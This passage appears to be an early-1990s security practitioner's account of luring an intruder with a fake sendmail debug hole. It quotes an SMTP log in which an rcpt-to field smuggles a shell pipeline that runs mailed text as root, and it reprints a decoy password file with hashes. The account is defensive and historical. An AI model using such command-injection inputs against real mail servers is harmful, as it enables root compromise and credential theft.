Unfriendly Acts

I first noticed our volunteer when he made a typical request through an old and deprecated route. He wanted a copy of our password file, presumably for the usual dictionary attack. But he attempted to fetch it using the old sendmail debug hole. (This is not to be confused with new sendmail holes, which are legion.)

The following log, from 15 Jan 1991, showed decidedly unfriendly activity:

19:43:10 smtpd: <--- 220 inet.att.com SMTP
19:43:14 smtpd: -------> debug
19:43:14 smtpd: DEBUG attempt
19:43:14 smtpd: <--- 200 OK
19:43:25 smtpd: -------> mail from:
19:43:25 smtpd: <--- 503 Expecting HELO
19:43:34 smtpd: -------> helo
19:43:34 smtpd: HELO from 
19:43:34 smtpd: <--- 250 inet.att.com
19:43:42 smtpd: -------> mail from: 
19:43:42 smtpd: <--- 250 OK
19:43:59 smtpd: -------> rcpt to: rcpt to:<|sed -e '1,/^$/'d | /bin/sh ; exit 0">
19:44:44 smtpd: shell characters: |sed -e '1,/^$/'d | /bin/sh ; exit 0"
19:44:45 smtpd: <--- 250 OK
19:44:48 smtpd: -------> data
19:44:48 smtpd: <--- 354 Start mail input; end with .
19:45:04 smtpd: <--- 250 OK
19:45:04 smtpd: /dev/null  sent 48 bytes to  upas.security
19:45:08 smtpd: -------> quit
19:45:08 smtpd: <--- 221 inet.att.com Terminating
19:45:08 smtpd: finished.

This is our log of an SMTP session, which is usually carried out between two mailers. In this case, there was a human at the other end typing (and mistyping) commands to our mail daemon. The first thing he tried was the DEBUG command. He must have been surprised when he got the "250 OK" response. (The implementation of this trap required a few lines of code in our mailer. This code has made it to the Unix System-V Release-4 mailer. The key line is the rcpt-to: command entered at 19:44:44. The text within the angled brackets of this command is usually the address of a mail recipient. Here it contains a command line. Sendmail used to execute this command line as root when it was in debug mode. In our case, the desired command is mailed to me. The text of the actual mail message (not logged) is piped through

sed -e '1,/^$/'d | /bin/sh ; exit 0"

which strips off the mail headers and executes the rest of the message as root. Here were two of these probes as I logged them, including a time stamp:

19:45    mail adrian@embezzle.stanford.edu 

 He wanted us to mail him a copy of our password file, presumably to
run it through a password cracking program.  Each of these probes came
from a user adrian on embezzle.stanford.edu.  They were
overtly hostile, and came within half an hour of the announcement of
U.S.  air raids on Iraq.  I idly wondered if Saddam had hired a
cracker or two.  I happened to have the spare bogus password file in the
FTP directory (shown elsewhere, so I mailed that back with a return
address of root.  I also sent the usual letter to Stanford
informing them of the presence of a hacker. 

 The next morning I heard from Stephen Hansen, an administrator at
Stanford.  He was up to his ears in hacker problems. 

 The adrian account had been stolen, and many machines
assaulted.  He and Tsutomu Shimomura of Los Alamos Labs were
developing wiretapping tools to keep up with this guy.  The assaults
were coming into a terminal server from a phone connection, and
they hoped to trace the phone calls at some point. 

 A wholesale hacker attack on a site usually stimulates the
wholesale production of anti-hacker tools, in particular, wire tapping
software.  The hacker's activities have to be sorted out from the steady
flow of legitimate traffic.  The folks at Texas A&M University
have made their tools available. 


 The following Sunday morning I received a letter from France:

To: root@research.att.com
Subject: intruder
Date: Sun, 20 Jan 91 15:02:53 +0100

I have  just closed an account on my machine
which has been broken by an intruder coming from
embezzle.stanford.edu. He (she) has left a file called
passwd. The contents are:

------------
>From root@research.att.com Tue Jan 15 18:49:13 1991
Received: from research.att.com by embezzle.Stanford.EDU
Tue, 15 Jan 91 18:49:12 -0800
Message-Id: <9101160249.AA26092@embezzle.Stanford.EDU>
From: root@research.att.com
Date: Tue, 15 Jan 91 21:48 EST
To: adrian@embezzle.stanford.edu
Root: mgajqD9nOAVDw:0:2:0000-Admin(0000):/:
Daemon: *:1:1:0000-Admin(0000):/:
Bin: *:2:2:0000-Admin(0000):/bin:
Sys: *:3:3:0000-Admin(0000):/usr/v9/src:
Adm: *:4:4:0000-Admin(0000):/usr/adm:
Uucp: *:5:5:0000-uucp(0000):/usr/lib/uucp:
Nuucp: *:10:10::/usr/spool/uucppublic:/usr/lib/uucp/uucico
Ftp: anonymous:71:14:file transfer:/:no soap
Ches: j2PPWsiVal..Q:200:1:me:/u/ches:/bin/sh
Dmr: a98tVGlT7GiaM:202:1:Dennis:/u/dmr:/bin/sh
Rtm: 5bHD/k5k2mTTs:203:1:Rob:/u/rtm:/bin/sh
Berferd: deJCw4bQcNT3Y:204:1:Fred:/u/berferd:/bin/sh
Td: PXJ.d9CgZ9DmA:206:1:Tom:/u/td:/bin/sh
Status: R
------------

Please let me know if you heard of him.


 Our bogus password file had traveled to France! (A configuration
error caused our mailer to identify the password text as  RFC 822  header
lines, and carefully adjusted the format accordingly.  The first letter was
capitalized, and there was a space added after the first colon on each line.)